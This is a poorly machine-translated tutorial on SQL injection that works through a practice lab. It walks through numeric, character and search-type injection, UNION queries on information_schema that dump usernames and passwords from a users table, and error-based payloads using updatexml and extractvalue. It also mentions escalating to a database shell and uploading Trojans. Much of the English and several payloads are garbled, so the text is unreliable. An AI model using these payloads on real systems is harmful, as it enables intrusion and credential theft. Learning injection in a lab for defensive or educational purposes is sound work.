SQL Inject exploits process
The first step: the injection point probing
Automatic mode: use web vulnerability scanning tools, automatically find the injection point
manually: manual configuration sql inject injection test statement discovery
Step Two: access to information
to obtain the desired data obtained through injection point
1. environmental information: database type, database version, operating system version, user information, etc.
2. The database information: database name, database tables, table fields, field content (encrypted content hack)
The third step: get permission to
obtain operating system permissions: database execute shell, upload Trojans
SQL injection type
Numeric: a digital input point inputted spliced directly into the database
, such as: select field 1 from table where id = (is the value of input points) 1, may be configured such payload, if GET transmission parameters can be written on URl 1 or 1 = 1, thus constructed a payload, out of the table walk, if the POST method is required to send a capture burpsuit repeater modified
Character: input character input point no treatment, directly spliced sql statement
as: select field 1 FROM table WHERE name = '', which is what our single quote entered, this payload may be configured such time, the first input a string is then a single quote sdsf ', the single quotation marks in front of the closed off, so that directly behind the single quotes # Zhushidiao is sdsf' or 1 = 1 #.
Search type: the string is entered directly mosaic, but the query may not be the same
as: select field from table where fields like '%%',% intermediate, is the value I entered to search, this is the case, it can be closed configuration, the first input character, and the front of the%% closed off as ds% ', then 1 = 1, then # comment out the back of the complete following ds%' or 1 = 1 # ,
UNION union query
SELECT A, B the FROM C WHERE ID =. 1 UNION SELECT F, D from C WHERE ID = 2;
UNION joint portion, the number of fields of inquiry, to and in front of the same, so that we can guess the output of a few values, such as select a, b FROM c where id = 1 UNION select database (), version ();
also can order by heuristics, select a, b FROM c where id = 1 order by 3, that is, with the first three sort, without the first three words will complain. This time we know only two outputs.
information_schema
What is information_schema?
We show databases look and found that there are many databases, and there are a informaion_schema, is the default database that comes with mysql, will save a lot of important information
use information_schema go look at the
show tables to look at his watch, found a TABLES table, the table which will keep TABLE_SCHEMA and TABLE_NAME, will the entire database, all instances of relevant information on here, and what's inside the database which will which names the table, the table that will be on the table type, etc. this table.
Yet another COLUMNS, there is also a TABLE_SCHEMA, TABLE_NAME, column_name, can be found in the corresponding table what fields.
select id, email from member where username = 'kobe' union select table_schema, table_name from information_schema.tables where table_schema = 'pikachu'
This operation can be checked out, pikachu how much this database table, what is the name of the table
We started testing
before s' order by 3 #, error unknown third column
and then try to s' order by 2 #, found that the normal error user name wrong, can be seen select the two fields;
can the union
s' union select database (), version () # detect the current version of the database and
the database know, constructed payload
S 'of Union table_schema the SELECT, table_name from information_schema.tables #
can traverse out the names of all databases and tables in each database, and then add where conditions are structured as follows payload, further confirming pikachu library which tables
s' union select table_schema, table_name from information_schema.tables where table_schema = 'pikachu' #
this time, we found a users table that is not table it is the user password we construct the following table payload users find out what fields
s' union select table_name, column_name from information_schema.columns where table_name = 'users' #
this time we find that, two users with a username and password fields, and configured to obtain user as payload name, password
s' union select username, passwo rd from users #
Based on the information being given access to function
Commonly used error function updatexml (), extractvalue (), floor ()
Thinking skills
to use some of the specified function in the Mysql to make an error, in order to gain information from the set of error messages. select / update / insert / delete / can be used to obtain information error
conditions: no shield background database error message when a syntax error will occur at the front output.
The updatexml () function is a function Mysql XPATH query an XML document and modify data
extractValue () function is a function Mysql XPATH query data for the XML document
Floor () is used in Mysql rounding function
updatexml () function: changes in the value of an XML document qualified node of
the syntax updatexml (xml_document, XPathstring, new_value)
The first argument: fiedname is String format, field names in the table for the
second argument: XPathstring (XPath format string)
the third argument: new_value, string format, replace the found qualified
positioning XPath is the second argument must be valid, otherwise an error occurs,
the second parameter if pass in an expression , after the function will first execute this expression, then the result of the implementation of a content being given to burst out
We need to enter a 'look Mysql error message will be output to the front desk to
find that you can see the error message database, structured as follows payload, in fact updatexml () which none of the three, so it does not matter, as long as we can to the version is displayed on the line
s 'and updatexml (1, version (), 3) #
but found, version is not displayed completely, into the following
S' and The updatexml (. 1, the concat (0x7E, version ()), 23 is) #
the concat is mysql function, whose role is composed of the two parameters which print out a complete string, hex ~ 0x7E is, so that you can put the full value is displayed version (), and with the other the hexadecimal notation is required.
We also can select the version into an expression statement, s' and updatexml (1, concat (0x7e, (select table_name from information_schema.tables where table_schema = 'pikachu')), 23) #
and then return the results found that due to the multiple lines , error, and this error can only show one line, so we limit it to optimize, limit 0,1 meaning is to check out the data, starting from the 0 position, take 1 line, 1 is the step size
s' and updatexml (1, concat (0x7e, ( select table_name from information_schema.tables where table_schema = 'pikachu' limit 0,1)), 23) #
ExtractValue (xml_document, xpath_string)
The first argument: xml_document is String format, the name of the XML document object of
the second argument: Xpath_string (Xpath string format)
Xpath positioning must be effective, otherwise an error will occur.
Here use this effect is the same with updatexml
Based Floor ()
Floor function if given to a configuration, these conditions must be inside the expression:
1. Inside have arithmetic COUNT
2. there must be operational by Group
3. which operation must be randomly rand value
